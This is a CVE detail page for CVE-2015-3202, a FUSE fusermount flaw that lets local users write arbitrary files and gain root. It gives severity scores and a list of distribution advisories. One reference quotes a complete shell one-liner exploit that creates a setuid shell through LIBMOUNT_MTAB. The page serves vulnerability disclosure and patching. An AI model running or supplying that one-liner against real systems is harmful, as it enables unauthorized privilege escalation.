Vulnerability Details : CVE-2015-3202
fusermount in FUSE before 2.9.3-15 does not properly clear the environment before invoking (1) mount or (2) umount as root, which allows local users to write to arbitrary files via a crafted LIBMOUNT_MTAB environment variable that is used by mount's debugging feature.
Products affected by CVE-2015-3202
- cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
- cpe:2.3:a:fuse_project:fuse:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2015-3202
0.04%
Probability of exploitation activity in the next 30 days
CVSS scores for CVE-2015-3202
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
3.6 | LOW | AV:L/AC:L/Au:N/C:N/I:P/A:P | 3.9 | 4.9 | NIST | |
CWE ids for CVE-2015-3202
-
Assigned by: nvd@nist.gov (Primary)
References for CVE-2015-3202
-
https://twitter.com/taviso/status/601370527437967360
Tavis Ormandy on Twitter: "a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202"
-
https://security.gentoo.org/glsa/201701-19
NTFS-3G: Privilege escalation (GLSA 201701-19) - Gentoo security
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159543.html
[SECURITY] Fedora 21 Update: ntfs-3g-2015.3.14-2.fc21
-
http://www.securityfocus.com/bid/74765
FUSE CVE-2015-3202 Local Privilege Escalation Vulnerability
-
http://www.debian.org/security/2015/dsa-3266
Debian -- Security Information -- DSA-3266-1 fuse
-
http://lists.opensuse.org/opensuse-updates/2015-06/msg00007.html
openSUSE-SU-2015:1003-1: moderate: Security update for fuse
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160094.html
[SECURITY] Fedora 20 Update: fuse-2.9.4-1.fc20
-
https://security.gentoo.org/glsa/201603-04
FUSE: incorrect filtering of environment variables leading to privilege escalation (GLSA 201603-04) - Gentoo security
-
http://lists.opensuse.org/opensuse-updates/2015-06/msg00005.html
openSUSE-SU-2015:0997-1: moderate: Security update for fuse
-
http://www.ubuntu.com/usn/USN-2617-3
USN-2617-3: NTFS-3G vulnerability | Ubuntu security notices
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159683.html
[SECURITY] Fedora 22 Update: fuse-2.9.4-1.fc22
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159831.html
[SECURITY] Fedora 21 Update: fuse-2.9.4-1.fc21
-
http://www.securitytracker.com/id/1032386
Filesystem in Userspace (FUSE) LIBMOUNT_MTAB Environment Variable Sanitization Flaw Lets Local Users Gain Elevated Privileges - SecurityTracker
-
http://www.openwall.com/lists/oss-security/2015/05/21/9
oss-security - CVE-2015-3202 fuse privilege escalation (Exploit)
-
https://gist.github.com/taviso/ecb70eb12d461dd85cba
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. · GitHub (Exploit)
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160106.html
[SECURITY] Fedora 20 Update: ntfs-3g-2015.3.14-2.fc20
-
http://www.ubuntu.com/usn/USN-2617-2
USN-2617-2: NTFS-3G vulnerability | Ubuntu security notices
-
https://www.exploit-db.com/exploits/37089/
Fuse 2.9.3-15 - Local Privilege Escalation
-
http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159298.html
[SECURITY] Fedora 22 Update: ntfs-3g-2015.3.14-2.fc22
-
http://packetstormsecurity.com/files/132021/Fuse-Local-Privilege-Escalation.html
Fuse Local Privilege Escalation - Packet Storm
-
http://www.ubuntu.com/usn/USN-2617-1
USN-2617-1: FUSE vulnerability | Ubuntu security notices
-
http://www.debian.org/security/2015/dsa-3268
Debian -- Security Information -- DSA-3268-1 ntfs-3g